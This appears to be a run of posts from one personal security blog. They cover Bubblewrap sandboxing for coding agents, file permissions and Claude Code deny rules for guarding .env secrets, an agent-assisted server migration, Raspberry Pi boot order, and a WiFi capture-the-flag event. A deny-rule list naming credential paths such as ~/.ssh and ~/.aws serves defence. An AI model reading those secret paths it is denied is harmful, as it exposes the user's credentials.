A big part of the reason for needing this, is –dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in desiging, experimenting & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld Server and vends web assembly quake clients. It’s an instant-lan party in a box. I did this unattended and it works. –dangerously-skip-permissions is very powerful- assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying with empty files (You need to know exact path of files 

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting with user-wrapped invocation of bubblewrap versus embedded bubblewrap in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

ThreatDIY bwrapAnthropic SRT
Claude accidentally rm -rf ~✓ Protected✓ Protected
Claude exfiltrating ~/.ssh✓ Protected✓ Protected
Supply chain attack via npm✓ Not exposed✗ Exposed
Subtle misconfiguration✗ Your risk✓ Their expertise
Agent Telemetry you don’t want sent✓ You control? Their choice
Novel bypass techniques✗ You’re on your own✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m ai slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that this is invoked different- we’re not going to call claude- we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your ~/$HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my github.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy 1 liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

Keeping secrets from Claude Code

How to keep your .env files safe from AI coding assistants

UPDATE: This post blew up! But I discovered a FAR SUPERIOR approach. You still might like this! But bubblewrap is faster and more flexible.

https://patrickmccanna.net/a-better-way-to-limit-claude-code-and-other-coding-agents-access-to-secrets/


Someone posted online:

“I like how Claude Code casually reads my .env file.”

This is an accurate assessment of Claude Code. Claude Code reads .env files by default. It loads your API keys, database passwords and tokens into memory without asking.

Is this unappealing to you? Here’s how to manage that risk.

The Problem

Claude Code can read .env files automatically. If you run it without -dangerously-skip-permissions, normally it’ll ask permission for access. But what if claude stops acting normal?

Should the secrecy of your file rely on a system that prevents access to your file till you just type in the phrase ‘yes’?

How is it possible that claude code can’t access the file some times- and other times it can?

It’s possible because you’re logged in and running claude under your user account. Claude has all the permissions it needs to masquerade as you! Claude always had access to the file! It’s just being polite. The politeness of LLMs cannot be relied upon. When you run claude this way, any file accessible by you is accessible by claude.

Claude code is not supposed to break out of the Current Working Directory. But what technical constraints prevent it? If you run claude under your account, there’s no Linux/Mac OS control that prevents it from getting around to the photos/docs you have access to.

You’re trusting Claude to be polite and behave the way you expect.

If you invoke Claude (or any coding agent) under your user account, you’re trusting trust. Don’t despair! Here’s how to run Claude when you’re working on systems that demand safety.

The First Defense: A Separate User

Give Claude its own identity. Create the ‘Claude’ Group and User accounts.

On Linux:

# Create a group for Claude
sudo groupadd claude

# Create a user with no home directory privileges beyond basics
sudo useradd -m -g claude -s /bin/bash claude

# Set a password (you’ll need it for sudo later)
sudo passwd claude

On macOS:

# Create a group (find an unused GID first)
sudo dscl . -create /Groups/claude
sudo dscl . -create /Groups/claude PrimaryGroupID 400

# Create the user
sudo dscl . -create /Users/claude
sudo dscl . -create /Users/claude PrimaryGroupID 400
sudo ddcl . -create /Users/claude UserShell /bin/bash
sudo dscl . -create /Users/claude NFSHomeDirectory /Users/claude
sudo dscl . -create /Users/claude UniqueID 400

# Create home directory and set ownership
sudo mkdir -p /Users/claude
sudo chown claude:claude /Users/claude

# Set password
sudo passwd claude

The claude user now exists- run claude as it’s own user and keep the secrets files outside the permissions of the claude user.

Lock Down Your .env Files

Your secrets need permissions that exclude the claude user.

# Navigate to your project
cd /path/to/your/project

# Set ownership to yourself
chown $(whoami):$(whoami) .env

# Lock Down Your .env Files
# Remove all permissions for others
# Owner can read and write.
# Group and others get nothing

chmod 600 .env

The 600 permission means only you can read the file. The claude user belongs to a different group.

For extra certainty, explicitly deny the claude group:

# make sure .env is owned by your primary group

chown $(whoami):$(id -gn) .env chmod 640 .env

Verify your work:

ls -la .env

You should see something like -rw------- or -rw-r-----. The important part: no permissions on the right side for “others.”

Run Claude under the Claude user account

Become claude! Claude now runs with our claude user’s permissions. Your secrets remain invisible to the claude user because you’ve acl’d away access to the .env file

# Switch to claude user and run Claude Code

sudo -u claude claude

That’s it. sudo -u claude runs the command that follows as the claude user. Claude Code launches. If it tries to read your .env file, it’ll get a permissions denied error it can’t overcome.

For convenience, create an alias:

# Add to your .bashrc or .zshrc alias
claudecode=’sudo -u claude claude’

Now you type claudecode and everything’s safe

Summarizing:

# One-time setup (Linux)
sudo groupadd claude
sudo useradd -m -g claude -s /bin/bash claude
sudo passwd claude

# Per-project setup
cd /your/project
chown $(whoami):$(whoami) .env
chmod 600 .env

# Daily usage
sudo -u claude claude

  • Create a dedicated user for claude
  • Set file permissions that exclude the claude user from access to sensitive files
  • Invoke claude with sudo -u claude. let the OS enforce boundaries

The claude user can read your source code. It can write to project directories if you grant that access. But it cannot touch files owned by you with restrictive permissions. The operating system enforces this.

In the next section, I’ll summarize Anthropic’s stated controls. When you go this route, you’re trusting Anthropic to not only respect your wishes, but to write code so secure that it always and only does what they intend. All software has mistakes, even Anthropic’s. Buyer beware.

I include this next section out of respect for Anthropic- but my judgement is that using the following approach will eventually bite you in the butt.


The Second Defense: Deny Rules

Claude has mechanisms for restricting access. You’re trusting Anthropic to do the right thing correctly all the time. Anthropic has published mechanisms for telling Claude Code what it cannot touch. Do this before you write your first line of code. The configuration lives in ~/.claude/settings.json.

Create the file. Add these rules:

{ "permissions": 
    { "deny": [ 
        "Read(**/.env*)", 
        "Read(**/secrets/**)", 
        "Read(**/*credentials*)", 
        "Read(**/*secret*)", 
        "Read(~/.ssh/**)", 
        "Read(~/.aws/**)", 
        "Read(~/.kube/**)" ] 
    } }

The double asterisks catch nested directories. They catch the .env.local file you forgot you had.

Test your rules. Ask Claude Code to read your .env file. It should fail. If it reads the file anyway, something is wrong. Fix it before you continue.

The anthropic access controls are like putting a lock on your door. It keeps honest people honest. Locks can be picked. AI assistants can be influenced into circumventing their own controls.


An alternative approach: Containers

Containers are an approach for protecting secrets.

Run Claude Code inside a Docker container or a virtual machine. Give it access only to what it needs. The container is a sandbox the AI plays within. Your secrets stay outside the container. Make claude build the thing- it can have its own internal .env files- but for prod, you change your secrets.

Configure your container with read-only volumes for code. Mount nothing sensitive.

The AI agent can see project files in your container. It cannot see your home directory. It cannot see your SSH keys. It can’t probe through the Photos library in your home directory.

This approach follows the principle of least privilege. Grant minimum access required. Assume the worst.

My advice: Use operating system permissions, user accounts and groups

Leveraging Operating system access controls is defense in depth. Deny rules can be misconfigured. Vault integrations can fail. But Unix permissions have guarded secrets for a long time. You have to decide which risk is more probable: Kernel exploits that circumvent ACL’s or prompt engineering that pushes the Agent to access secrets. I’m going to put my resources into ACL’s and good OS hygenie. Then approaches don’t get distracted by clever prompts.

The Truth About AI Security

There is no going back. Claude is insanely useful. Coding agents write code faster than you can. They explain concepts clearly.

Coding agents are also prone to probabilistic outbursts. If you need to keep secrets, use deterministic/idempotent operating system access controls for preventing access.

Using custom AI Agents to Migrate Self-Hosted Services Between Servers

Migrations are hard.

I ran into an infrastructure challenge during my IoT development. A Raspberry Pi 5 (kbr server) ran three self-hosted services—Planka (Kanban boards), Ghost (blog), and Homer (dashboard). I needed to migrate them to a more powerful server running AMD Ryzen hardware. This would free my dev box up to experiment with new features in my Kanban/Blog/Reporting (KBR) tool.

The server I want to migrate to is already hosting critical AI services (Ollama, Open WebUI, and n8n). I do not want them disrupted during the migration.

Both systems used Cloudflare Tunnels for secure external access, Docker for containerization. They each had existing Ansible playbooks for deployment and backup. I wanted to:

  • Fully migrate production services from a Pi to the new server
  • Preserve all data (posts, drafts, images, kanban cards, attachments)
  • Keep existing AI services running untouched
  • Convert the old Pi into a development environment
  • Execute a clean DNS cutover with minimal downtime

The big problem is the limitations of my own brain. As I’ve been doing more AI supported development, the pace of my achievements is making it hard for me to maintain awareness of how everything is configured. I built this system months ago. My memory of how to backup and rebuild everything has faded. I had playbooks for building, but migrating existing data to a new deployment is a different beast.

Discovery Phase: Understanding Both Systems

I needed to deeply understand both systems to build a migration plan. I overcame my gaps in memory about how everything works by creating & using automated exploration agents to gather comprehensive information about each system’s architecture and deployed software.

For this project, the general design of my agents included:

  • an objective,
  • 7 phases of migration activities
  • Clear expressions around safety & best practices & defined success conditions.

My Agents have the following set of objectives:

You are a system analysis agent. Your task is to:
1. Review historical knowledge from previous agents
2. Analyze the project codebase to understand the intended system architecture
3. Connect to the running deployment and gather actual system state
4. Compare expected vs actual state
5. Produce a structured summary for troubleshooting purposes
6. Update knowledge repositories with discoveries
7. Create an Operations.md file in the Operations directory of the project if it doesn't exist.  

At a top level, the phases include:

Phase 0: Knowledge Base Review
Phase 1: Repository Structure Analysis
Phase 3: Live System Discovery
Phase 4: Analysis & Comparison
Phase 5: Context Documentation & Knowledge Updates
Phase 6: Operations Documentation
Phase 7: Final Deliverable

The general gist of the above is:

Search from a knowledge base of previous agent troubleshooting sessions that captured problems that were discovered & corrected. I do this because it reduces any need for redundant troubleshooting activities by the agents across different sessions. This also helps manage my token budget for the work.

Next, the agent looks into the code that generates the project to understand what’s supposed to be on the target system.

Then the agent looks into a live system to understand what’s actually on the systems (either due to configuration drift or some other change).

When that’s complete, we go munge everything we have into an operations document. This becomes my operations report.

Source System (kbr server) Discovery

The exploration agent showed:

  • 6 containerized services: Planka, Ghost, Homer, PostgreSQL, MySQL, and Nginx
  • 7 Docker volumes requiring backup (database data, attachments, content, avatars, etc.)
  • Cloudflare tunnel routing traffic for kanban.url, blog.url, and reports.url
  • Existing Ansible playbooks for backup and restore operations
  • Well-documented architecture in markdown files

Target System (ai server) Discovery

The agent found that the server I want to migrate to had:

  • Existing protected services: Ollama (LLM inference), Open WebUI (chat interface), n8n (workflow automation)
  • A Reserved ports list
  • A Storage constraint: /home partition at 75% capacity—I had to put new services in /opt/
  • Available resources: 650GB disk space in /opt/, 25GB+ RAM available
  • Active Cloudflare tunnel for my AI endpoint that I had to keep untouched

Validating Backup Procedures

I validated that the deployed backup scripts followed official documentation. I’ve found that the agents sometimes try to invent their own backup strategies. They can work, but they also break future updates. Next I fetched the official backup guides for both Ghost and Planka, then had the agent compare them against the existing backup_kbr.sh script.

The existing backup script matched all requirements and exceeded them with additional safeguards like SHA256 checksums and comprehensive manifests.

Planning Phase: Building a 10-Phase Migration Plan

I built a comprehensive migration plan through iterative review with the agent. I discussed, refined, and enhanced each phase based on operational concerns.

The 10 Phases

PhasePurpose
1. Pre-Migration PreparationVerify prerequisites, create rollback points
2. Data Quality AssessmentGenerate backup, verify integrity, record baseline counts
3. Prepare ai serverCreate directory structure, Docker Compose stack
4. Data Transferrsync backup to target, restore databases and volumes
5. Testing (QA/QC)Local testing, data verification, create Ghost API key
6. Staging DNSAdd temporary *bak DNS names to ai server tunnel
7. Staging ValidationExternal testing, write tests, Go/No-Go checkpoint
8. Reconfigure kbr serverConvert to dev environment with *-dev DNS names
9. DNS CutoverSwitch production names to ai server
10. CleanupRemove staging DNS, update Homer links, set up monitoring

Key Planning Decisions

DNS Strategy: I implemented a staged approach:

  • Current: Production names on kbr server
  • Staging: Temporary *bak names on ai server for testing
  • Final: Production names transferred to ai server
  • Dev: New *-dev names on kbr server for experimentation

Port Allocation: The agent selected ports that don’t conflict with existing services.

Storage Location: The agent put all migration files in /opt/kbr-migration/ to avoid the space-constrained /home partition.

Enhancements I Added During Review

Through iterative discussion, I enhanced the plan with:

  • Health check loops instead of arbitrary sleep commands for database readiness
  • rsync with progress instead of scp for large file transfers
  • Baseline counts table to verify I lost nothing (posts, drafts, images, cards, attachments)
  • Write tests to verify full functionality (create test post, create test card)
  • Go/No-Go checkpoints before major transitions
  • Rollback procedures with automatic restoration on failure
  • Ghost Content API key creation for the reporting dashboard
  • Homer URL updates since the migrated config still pointed to old URLs

Executing the Plan

Prerequisites

Before I started execution:

  • Obtain a Cloudflare API token with DNS edit permissions for the domain
  • Verify SSH access to both servers
  • Confirm Docker runs on both systems
  • Check available disk space in /opt/ on ai server

Execution Flow

Phases 1-2: Safe, Read-Only Operations

These phases don’t modify any running services. They create backups, verify data integrity, and establish baseline measurements. If anything looks wrong, I stop here—no harm done.

# Run the backup
cd /home/Development/Playbooks/SelfHosted_K_B_R
ansible-playbook -i inventory backup.yml

# Record baseline counts for later comparison
ssh account@kbr.server
docker exec ghost-db mysql -u ghost -p... ghost \
  -e "SELECT status, COUNT(*) FROM posts GROUP BY status;"

Phases 3-5: Target System Setup

I create the Docker infrastructure on ai server and restore the backup. I test locally before any DNS changes.

# Create directory structure
sudo mkdir -p /opt/kbr-migration
sudo chown account:account /opt/kbr-migration

# Transfer and extract backup
rsync -avh --progress backups/*.tar.gz account@ai.server:/opt/kbr-migration/

# Start databases with health checks
docker-compose up -d planka-db ghost-db
until docker exec kbr-planka-db pg_isready -U planka; do sleep 2; done

# Restore data
zcat databases/planka_db.sql.gz | docker exec -i kbr-planka-db psql -U planka -d planka

Phases 6-7: Staging Validation

I add temporary DNS names and test externally. This is the last safe checkpoint—production still runs on kbr server.

The Go/No-Go checkpoint requires all tests to pass:

  • All staging URLs accessible
  • Images and drafts verified
  • Test post/card creation works
  • Existing ai domain endpoint still functional
  • Baseline counts match

Phases 8-9: The Cutover

This is where production switches. A brief window of unavailability exists between reconfiguring kbr system and completing the DNS cutover on the ai server.

# On kbr server: Switch to dev names
# On ai server: Add production names to tunnel
cloudflared tunnel route dns <tunnel-id> kanban.myurl.io
cloudflared tunnel route dns <tunnel-id> blog.myurl.io
cloudflared tunnel route dns <tunnel-id> reports.myurl.io

Phase 10: Cleanup

I remove temporary staging DNS entries, update Homer dashboard links to point to production URLs, and set up automated backups and health monitoring.

Rollback Capabilities

The plan includes rollback procedures at multiple points:

  • Before Phase 8: Simply remove staging DNS from ai server; kbr server remains production
  • After Phase 9: Re-route production DNS back to kbr server, restore its original tunnel config

I backed up all cloudflared configs before modification, enabling quick restoration if needed.

Lessons Learned

What Made This Migration Plannable

  • Existing documentation: Both systems had Operations directories with current state information
  • Ansible playbooks: Existing backup/restore automation provided a foundation
  • Docker containerization: Clean separation of services made migration straightforward
  • Cloudflare Tunnels: DNS changes don’t require firewall modifications

Prompt Engineering Insights

The planning session revealed that infrastructure migration requests benefit from explicit upfront information:

  • Migration type (full migration vs. backup copy)
  • Post-migration role for source system
  • DNS naming constraints (Cloudflare doesn’t allow underscores)
  • Storage preferences on target system
  • Links to official backup documentation
  • Specific data verification requirements
  • Service dependencies (API keys, credentials)
  • Rollback expectations

A structured prompt template capturing these elements can reduce planning clarification cycles significantly.

Conclusion

Migrating self-hosted services between servers doesn’t have to be scary. I used agents to perform discovery through a phased approach that included staged DNS testing, and clear rollback procedures to execute this complex migration.

The key principles:

  • Discover before planning: Understand the source and migration destination systems deeply
  • Validate backup procedures: Ensure they match official documentation
  • Stage before cutting over: Test with temporary DNS names first
  • Build in checkpoints: Go/No-Go decisions prevent premature transitions
  • Plan for rollback: Every change should be reversible
  • Verify with baseline counts: compare before and after

THE BOOT ORDER OF THE RASPBERRY PI IS UNUSUAL!

I discovered that the Raspberry Pi doesn’t boot the same way traditional PC’s do. This was interesting and I thought I’d share.

At a high level, Raspberry Pi booting is firmware-driven, not BIOS-driven like a PC. On Raspberry Pi, the GPU (VideoCore) is powered first and is the root of trust for booting. The ARM CPU is not the initial execution environment. This is a deliberate architectural choice dating back to the original Pi.

Boot sequence (simplified):

1. Power applied

  • Power management IC brings up rails\
  • VideoCore GPU comes up first
  • ARM CPU is held in reset

2. VideoCore ROM Executes (GPU Side)

  • Immutable GPU boot ROM runs
  • This code:
    • Initializes minimal SDRAM
    • Reads boot configuration
    • Locates next-stage bootloader

The ARM cores are still powered down.

3. GPU Loads Firmware

  • GPU reads EEPROM bootloader
  • EEPROM bootloader then loads firmware from SD / USB / Network

The loaded firmware files are GPU Binaries- not ARM code!

  • start*.elf
  • fixup*.dat

4. GPU Configures the System

The GPU:

  • Parses config.txt
  • Applies device tree overlays
  • Allocates memory split (GPU vs ARM)
  • Initializes clocks and peripherals
  • Loads the ARM kernel image into RAM

At this point, the system hardware layout is defined by the GPU, not the CPU.

5. GPU Releases the ARM CPU from Reset

Only after:

  • Firmware is loaded
  • Memory is mapped
  • Kernel is staged

…does the GPU release the ARM core(s) and set their entry point.

This is when the CPU first executes instructions.

6. ARM CPU Starts Linux

  • CPU jumps directly into:
    • kernel7.img / kernel8.img
  • Linux takes over
  • GPU becomes a peripheral (mailbox, display, VPU, etc.)

This explains several Raspberry Pi oddities:

  • The Raspberry Pi has No BIOS / UEFI
  • The config.txt is not a Linux File
  • Kernel Replacement Is Trivial
  • Boot failures before Linux is loaded are invisible to Linux

Even with the EEPROM bootloader:

  • The GPU still executes first
  • The EEPROM code is executed by the GPU
  • ARM remains gated until kernel handoff

EEPROM just replaces bootcode.bin; it does not change authority.

The trust chain for the pi is:

GPU ROM → GPU firmware → ARM kernel → Linux userspace

The trust chain choices have consequences!

  • ARM cannot verify GPU firmware
  • Secure boot (where enabled) is GPU-anchored
  • This is why Raspberry Pi secure boot is not comparable to PC Secure Boot

The Raspberry Pi Secure boot implementation ensures that:

  • Only cryptographically signed boot firmware and kernel images are executed
  • The chain of trust starts in the VideoCore GPU, not the ARM CPU
  • The system can be locked to a specific vendor or deployment

It does not:

  • Provide a hardware-enforced user/kernel trust boundary
  • Protect against a malicious or compromised GPU firmware
  • Provide measured boot or TPM-style attestation
  • Prevent runtime compromise of Linux

Here’s the order of operations for boot up on a traditional PC:

Traditional PC Boot:

  ┌─────────────┐
  │    BIOS     │
  │   (CPU)     │
  └──────┬──────┘
         ↓
  ┌─────────────┐
  │  Bootloader │
  │   (CPU)     │
  └──────┬──────┘
         ↓
  ┌─────────────┐
  │   Kernel    │
  │   (CPU)     │
  └─────────────┘

The firmware embedded in the motherboard powers up the CPU. The CPU loads the bootloader. The bootloader hopefully correctly does cryptographic operations to load an unmodified kernel. From here, the boot process continues with init/systemd and our services are brought online for a running system.

The pi’s totally different. Instead of starting with the CPU, we start with the GPU.

Raspberry Pi Boot:

┌─────────────┐
│  VideoCore  │ ← GPU boots FIRST
│    (GPU)    │
└──────┬──────┘
       ↓
┌─────────────┐
│ Loads ARM   │
│   kernel    │
└──────┬──────┘
       ↓
┌─────────────┐
│  ARM CPU    │ ← CPU starts LAST
│   wakes up  │
└─────────────┘

Why? The Raspberry Pi uses Broadcom BCM2xxx chips where The “main” processor is a VideoCore IV/VI GPU is activated at power-on. It runs proprietary firmware that handles the boot. The BCM2xxx chips are typically used in set-top boxes for video streaming/entertainment. For these types of devices, the goal is to quickly get to a flashy user interface. The Raspberry Pi Foundation chose these inexpensive chips as their base that leave them with an odd boot order.

Raspberry Pi WiFi CTF Lab Experiment Results

This past Saturday, I hosted a Wifi CTF at Big Block Brewery in Carnation WA. This was my first experiment where I could gather information about how other folks perceive my CTF. A big challenge for me is discovering what’s discoverable to participants. Running this lab would help me learn if this project is viable. The big questions are:

  1. Will the lab work- are the vulnerabilities & scoring system reliable?
  2. Will participants be able to figure out the IP network of the wifi network and discover targets for exploitation?
  3. What kind of after-action reporting can I generate?

Did the lab work?

Yes! I arrived at about 12:20pm and had the lab up and running by about 12:55. I had a small bobble- when I arrived, it looked like I may have brought the wrong pi for the CTF: the hostname on the access point reverted back to “ansibledest.local” and only had 8 commands in it’s history. But it turned out that there was just a hostname bug in the latest build. LED animations fired up when I powered on which meant it had to have my Vulnerable AP code on there.

6 people signed up for the lab in advance of the event. 5 showed up and we ended up having 2 additional pub patrons join. I left the lab up till roughly 5pm. Here are some basic statistics from the ctf admin’s ui:

Were participants able to figure out the IP addressing?

This was a little unclear to me.

The group was able to score- so they obviously found and exploited things, but I did talk folks through the idea of a “Default Gateway” and how to look on their devices to figure out their own system’s IP and the target system. Did I taint the data? I’m not sure. I suspect a couple folks port scanned & targeted their own laptops during a network scan. I’m concerned that my presence may have been a necessary to give folks a pointer on what to explore.

What kind of after-action reporting can I generate?

I pulled logs off the vulnerable access point and did some rough analysis. Logs included the raw webserver logs as well as the database I use to track scoring & exploit attempts.

Over the course of the event, there were 7 participants with 466 exploit attempts and 28 solves. 10 out of the 23 challenges were solved by the participants. One participant- Sl0hth2 successfully achieved remote root on the access point. Sl0hth2 also was the first to successfully score in several CTF challenges, which gave him scoring bonuses. A general question would be- how many clients did we see attach/reattach? Here are some DHCP metrics:

DHCP Lease attempts

204 of 280 DHCP entries (73%) are from a test device that periodically attached and detached from the network, which gave participants an opportunity to sniff & crack a 4 way handshake. The participant per-registration dhcp traffic was only ~76 events.

Scoring Milestones

I ran a report of the First-blood modifier bonuses- which helps you get a feel for who got most “first strike” points as well as an intuition into what classes of challenges people scored on.

First Blood Scoring Modifications

Now we’re ready to look into what the attack traffic was during the event. The largest volume of attack traffic was SQL injection. There is a login page and a user database query page that can be targeted for exploitation. I’ve put some effort into designing the database to be resilient to data destruction attacks- so it’s utility for “gaining root” on the device is limited. For many people, SQL injection is the ‘hello world’ of security exploitation- so I have some challenges that can be used for scoring.

SQL Injection Attacks

Next was command injection. The solution has a web page that vends access to the ping utility. Command injection can be used to run arbitrary commands on the device- and it presents an entrypoint for doing some enumeration of the host system’s configuration and getting some remote command access.

The next most popular attack was XSS. Again- low utility for remote compromise, but a good way to grab some points.

XSS Attacks

Next we have some file-based attacks. Here we’re starting to see evidence that participants were able to modify the file system and get it to execute attacker-controlled/created code:

File-based attacks

Finally we have some information disclosure attacks. We get evidence that participants were able to navigate to and interrogate some high value exploitation assets on the system:

So in summary, we had 154 attack attempts. Most of the focus was on Command Injection, SQL injection & XSS. Given the scoring distribution, it’s not surprising how few folks

Information Disclosure attacks

Next Steps

I’ll be sending a note out to the participants giving folks their own scoring data if I have it.

I have a few bugs logged at https://github.com/CaptainMcCrank/wifi-ctf-bugs that I’ll increment.

I had a few more feature ideas: The web app needs to present signals of successful exploitation to the participants. I’ve put more effort into the LED- which draws walk-ons but gets little inspection by participants.

There are some edits to the documentation that need to be pursued.

I hope to have a new build ready for some testing by the end of this week. I’m looking for another location to run a beta test. If you want to partner, please reach out. You can connect with me on linked in: https://www.linkedin.com/in/patrickmccanna/